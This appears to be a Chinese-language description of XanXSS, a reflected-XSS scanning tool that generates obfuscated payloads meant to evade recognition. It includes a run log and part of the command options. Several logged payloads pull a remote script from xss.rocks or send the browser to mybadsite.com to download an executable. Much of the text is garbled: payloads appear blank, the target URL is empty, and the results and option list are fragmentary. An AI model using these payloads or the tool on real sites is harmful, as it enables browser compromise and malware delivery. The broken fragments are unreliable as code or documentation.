XanXSS 是一款反射型 XSS 搜索工具(DOM 版本即将推出),它能基于模板生成 payload。与其他仅仅遍历 payload 列表的 XSS 扫描器不同,XanXSS 会努力让 payload 变得难以识别,例如:
/>cLIcK Me! XaNxss
使用 XanXSS,每个 payload 都各不相同。XanXSS 的工作原理是遍历 payload,直到找到指定数量的有效 payload 或计时器达到最大时间,这可以避免无限循环。XanXSS 包含的一些功能:
在这个概念验证中,我们将使用
admin@TBG-a0216:~/bin/python/xanxss$ python xanxss.py -u " -a 12 -t 12 -f 25 -v
____ ___ ____ ___ _________ _________
\ \/ /____ ____ \ \/ / / _____// _____/
\ /\__ \ / \ \ / \_____ \ \_____ \
/ \ / __ \| | \/ \ / \/ \
/___/\ (____ /___| /___/\ \/_______ /_______ /
\_/ \/ \/ \_/ \/ \/
[info][16:37:34] running payloads through tampering procedures
[info][16:37:34] payloads tampered successfully
[debug][16:37:34] running payload ' '
[debug][16:37:34] running payload ' '
[debug][16:37:34] running payload ' '
[debug][16:37:34] running payload ' '
[debug][16:37:34] running payload ' A=%0aprompT,A(();=%09'htTp://xSs.rockS/XSs.Js' XAnXsS '
[debug][16:37:35] running payload ' '
[debug][16:37:35] running payload ' '
[debug][16:37:35] running payload ' xanxSS '
[debug][16:37:35] running payload ' aLert((1)); '
[debug][16:37:35] running payload ' '
[debug][16:37:35] running payload ' ConFIrm(();= wIndow.LoCATIoN= \u005g;(pRoMPT))``;=%0A'htTpS://MyBaDSitE.cOM/dOwnLoAd.phP?iTem=+(pRomPt)``;=%0apuMPEDuPkICKs.exE'jaVAScrIpt:/*--> ClIcK/*/mE! '
[debug][16:37:35] running payload ' '
[debug][16:37:36] running payload ' XanXss '
[debug][16:37:36] running payload ' '
[debug][16:37:36] running payload ' '
[debug][16:37:36] running payload ' AleRt(1); '
[debug][16:37:36] running payload ' '
[debug][16:37:36] running payload ' CLick%00Me! '
[debug][16:37:37] running payload ' ALeRt(1); '
[debug][16:37:37] running payload ' '
[debug][16:37:37] running payload ' co\U006EfiR\u006\u003id();=%09'HTtPS://MYBAdsiTE.com/doWNload.php?itEm=+((CoNfIrm)();=">puMpedUPKickS.eXe' XanXsS cLICk/*/Me! '
[debug][16:37:37] running payload ' xANXss '
[debug][16:37:37] running payload ' '
[debug][16:37:37] running payload ' '
[debug][16:37:38] running payload ' clIcK mE! '
[warning][16:37:48] times up dumping found
--------------------------------------------------
~~>
~~>
~~>
--------------------------------------------------
[info][16:37:48] found a total of 3 working payloads
Payload:` ` 
尝试查找指定数量的有效 payload。指定此参数不保证你一定能找到该数量的有效 payload(*默认=25)
-t TIME, --time TIME 测试所花费的秒数,这将被用作验证的计时器(*默认=35s)
-p SCRIPT, [SCRIPT, ...], --payloads SCRIPT, [SCRIPT, ...]
传递一个逗号分隔的自定义 payload 列表,必须至少包含 5 个 payload
-v, --verbose 以详细模式运行,显示更多输出(*默认=False)
-H HEADER=VALUE,HEADER:VALUE, --headers HEADER=VALUE,HEADER:VALUE
-P, --polyglot 生成一个多语言脚本(polyglot)附加到正在运行的脚本末尾,如果存在 XSS,它应该能发现(*默认=False)